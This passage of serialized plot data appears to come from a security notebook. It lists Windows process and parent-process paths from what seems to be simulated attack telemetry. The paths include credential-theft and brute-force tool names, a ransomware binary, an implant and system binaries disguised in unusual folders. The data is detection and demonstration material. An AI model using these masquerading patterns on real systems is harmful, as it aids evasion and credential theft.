d.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat\",\"C:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\whoami.exe\",\"C:\\\\Windows\\\\System32\\\\HOSTNAME.EXE\",\"C:\\\\Windows\\\\System32\\\\NETSTAT.EXE\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ftp.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\dubrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\nlbrute.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\smss.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ASC_Alerttest_662jfi039n.ex\\ne\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\net1.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cacls.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\2840.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\a_keygen.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\bittorrent.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\ransomware.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\pcalua.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\findstr.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\odbcconf.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\SQLDumper.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mt.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\hd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\netsh.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Windows\\\\System32\\\\sc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\mimikatz.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\Fonts\\\\conhost.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\tasklist.exe\"],\"ParentProcessName\":[\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\regsvr32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\suchost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\certutil.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\implant.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\net.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\vssadmin.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\lsass.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\Fonts\\\\csrss.exe\",\"C:\\\\Windows\\\\System32\\\\win32calc.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Diagnostics\\\\UserTmp\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\"],\"TimeGenerated\":{\"__ndarray__\":\"AHB09v6EdkIAUHv2/oR2QgBAf/b+hHZCABCA9v6EdkIAAIP2/oR2QgDghPb+hHZCAPCF9v6EdkIAQIn2/oR2QgDgifb+hHZCAICK9v6EdkIAMI32/oR2QgBQkPb+hHZCAHCT9v6EdkIAUJT2/oR2QgAAl/b+hHZCAPCZ9v6EdkIAcJz2/oR2QgAgn/b+hHZCANCh9v6EdkIAcKb2/oR2QgDAqfb+hHZCAFCt9v6EdkIAcLD2/oR2QgAQsfb+hHZCABBB8/6EdkIA8Ezz/oR2QgCQTfP+hHZCAOBV8/6EdkIAIFfz/oR2QgDwXPP+hHZCANBd8/6EdkIAYHHz/oR2QgAwo/T+hHZCALAc9f6EdkIAsB31/oR2QgAwH/X+hHZCAKAg9f6EdkIAECL1/oR2QgBgPfX+hHZCAMBB9f6EdkIAMEf1/oR2QgBQS/X+hHZCAFBQ9f6EdkIAEFP1/oR2QgAQWPX+hHZCACCq9f6EdkIAEK31/oR2QgDQsfX+hHZCAMC09f6EdkIAULn1/oR2QgBAvPX+hHZCAHDA9f6EdkIAkMP1/oR2QgDwx/X+hHZCANDK9f6EdkIA0M71/oR2QgDw0fX+hHZCABDW9f6EdkIAMNn1/oR2QgAw3fX+hHZCABDg9f6EdkIAsOT1/oR2QgBwYfX+hHZCAJBl9f6EdkIAsGz1/oR2QgAwcPX+hHZCADB09f6EdkIAsHf1/oR2QgAAevX+hHZCAHB69f6EdkIAcHr1/oR2QgAQhfX+hHZCAJCI9f6EdkIAwIz1/oR2QgAQkPX+hHZCACCW9f6EdkIA4Jn1/oR2QgBAnvX+hHZCAPCk9f6EdkIAgDX2/oR2QgDwNvb+hHZCABA69v6EdkIAMD32/oR2QgBQP/b+hHZCAABH9v6EdkIAEEj2/oR2QgCwSfb+hHZCAMBK9v6EdkIAAEz2/oR2QgDQTPb+hHZCABBO9v6EdkIAIE/2/oR2QgBAUvb+hHZCANBV9v6EdkIA8Fj2/oR2QgAQXPb+hHZCADBf9v6EdkIAgGL2/oR2QgAwZfb+hHZCAOBm9v6EdkIA8Gf2/oR2QgBAa/b+hHZCADBu9v6EdkIAUHH2/oR2QgAQtvb+hHZCAEC29v6EdkIAkLj2/oR2QgAwv/b+hHZCACDC9v6EdkIAEMX2/oR2QgBQx/b+hHZCAADJ9v6EdkIAIMz2/oR2QgDAzPb+hHZCACDR9v6EdkIAAOz2/oR2QgAw8Pb+hHZCAGD19v6EdkIA8Pj2/oR2QgDA+fb+hHZCAAD79v6EdkIAEPz2/oR2QgAwAPf+hHZCACAD9/6EdkIAQAb3/oR2QgAwCff+hHZCAJAJ9/6EdkIAYA73/oR2QgDgEPf+hHZCADAT9/6EdkIAIBf3/oR2QgBAGvf+hHZCADAd9/6EdkIAUCD3/oR2QgBwI/f+hHZCACAm9/6EdkIAQCn3/oR2QgBwLff+hHZCAMAw9/6EdkIAcDP3/oR2QgCQOvf+hHZCALA+9/6EdkIAcEH3/oR2QgAgRPf+hHZCABBH9/6EdkIA8En3/oR2QgAQTPf+hHZCABDv9f6EdkIAQPP1/oR2QgDQ9vX+hHZCADD79f6EdkIAUP/1/oR2QgCQBPb+hHZCAFAJ9v6EdkIA0Av2/oR2QgAwEPb+hHZCAFAT9v6EdkIAABX2/oR2QgBQGPb+hHZCACAd9v6EdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[160]},\"index\":[46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,76,77,78,79,80,81,82,85,89,90,91,92,93,94,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,221,222,223,224,225,226,227,230,231,232,233,234,235],\"y_index\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]},\"selected\":{\"id\":\"1711\"},\"selection_policy\":{\"id\":\"1712\"}},\"id\":\"1619\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"active_multi\":{\"id\":\"1683\"},\"tools\":[{\"id\":\"1683\"}]},\"id\":\"1669\",\"type\":\"Toolbar\"},{\"attributes\":{\"axis\":{\"id\":\"1665\"},\"ticker\":null},\"id\":\"1668\",\"type\":\"Grid\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1717\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1715\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"data\":{\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-\\nDE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicin\\ngstack_31bf3856ad364e35_10.0.14393.2602_none_7ee60\\n20e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program 